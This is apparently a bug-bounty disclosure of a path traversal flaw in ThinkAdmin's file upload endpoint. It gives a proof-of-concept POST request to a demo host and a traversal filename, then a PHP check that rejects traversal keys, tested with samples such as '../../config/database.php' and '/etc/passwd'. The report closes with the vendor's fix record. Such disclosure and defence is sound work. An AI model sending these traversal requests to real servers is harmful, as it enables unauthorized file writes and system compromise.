External Control of File Name or Path in zoujingli/thinkadmin


Reported on Sep 15th 2021


upload file to any path

Proof of Concept

A user can upload a file to any path via path traversal.

POST /admin/api.upload/file.html HTTP/2
Host: v6.thinkadmin.top
Cookie: lang=zh-cn; PHPSESSID=88a2945fb139bb74f87137d2144709ab; limit=20
Content-Length: 14170
Sec-Ch-Ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"
Accept: text/plain, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAn0D7Qsi6kRX5BBr
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://v6.thinkadmin.top
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://v6.thinkadmin.top/admin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

Content-Disposition: form-data; name="key"

Content-Disposition: form-data; name="safe"

Content-Disposition: form-data; name="uptype"

Content-Disposition: form-data; name="file"; filename="aaa.jpg"
Content-Type: image/jpeg


Here you can see I can traverse the path e4/../949bdb5f9077bfed982ca9b7bfadbeb.jpg and it will upload the file.
Now you can access the file by going to https://v6.thinkadmin.top//upload/949bdb5f9077bfed982ca9b7bfadbeb.jpg .
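For comparison, an added server-side check in PHP that rejects a storage name like the one above before anything is written (example code, not ThinkAdmin's own code or its fix commit). The upload endpoint comes from the report; that the traversal string travels in the "key" form field, the upload root and the function name are assumptions.

```php
<?php
// Added example, not ThinkAdmin's own code: validate the client-supplied storage
// name before a file is written. The endpoint (/admin/api.upload/file) comes from
// the report; that the traversal string travels in the "key" field, the upload
// root and the function name are assumptions.

function safeUploadPath(string $uploadRoot, string $key): ?string
{
    // Allow-list the shape of the name: segments of [A-Za-z0-9_-] separated by
    // single forward slashes, ending in a short extension. This refuses "..", ".",
    // empty segments, backslashes, NUL bytes and absolute paths without any string
    // surgery that could be worked around. \z (not $) so a trailing newline fails.
    if (strlen($key) > 255 ||
        !preg_match('#^[A-Za-z0-9_\-]+(/[A-Za-z0-9_\-]+)*\.[A-Za-z0-9]{1,8}\z#', $key)) {
        return null;
    }

    $root   = rtrim(str_replace('\\', '/', $uploadRoot), '/');
    $target = $root . '/' . $key;

    // Defence in depth: lexically confirm the target still sits under the root.
    // realpath() is not used here because the target file does not exist yet.
    if (strncmp($target, $root . '/', strlen($root) + 1) !== 0 ||
        strpos($target, '/../') !== false || strpos($target, '/./') !== false) {
        return null;
    }
    return $target;
}

// Constructed sample keys, including the traversal key quoted in the report.
$root = '/var/www/public/upload';
foreach ([
    'e4/949bdb5f9077bfed982ca9b7bfadbeb.jpg',     // accepted: stays under upload/
    'e4/../949bdb5f9077bfed982ca9b7bfadbeb.jpg',  // rejected: ".." segment
    '../../config/database.php',                  // rejected: leading ".."
    '/etc/passwd',                                // rejected: absolute path
    "e4/x.jpg\0.php",                             // rejected: NUL byte, no match
] as $key) {
    printf("%-45s => %s\n", addcslashes($key, "\0"), safeUploadPath($root, $key) ?? 'REJECTED');
}
```

The accepted path is the only one that should ever reach the storage driver; everything else is answered with an error before any filesystem call.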


This vulnerability is capable of...

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back 2 years ago
邹景立 validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
邹景立 marked this as fixed with commit 29b05d 2 years ago
邹景立 has been awarded the fix bounty
This vulnerability will not receive a CVE 2 years ago

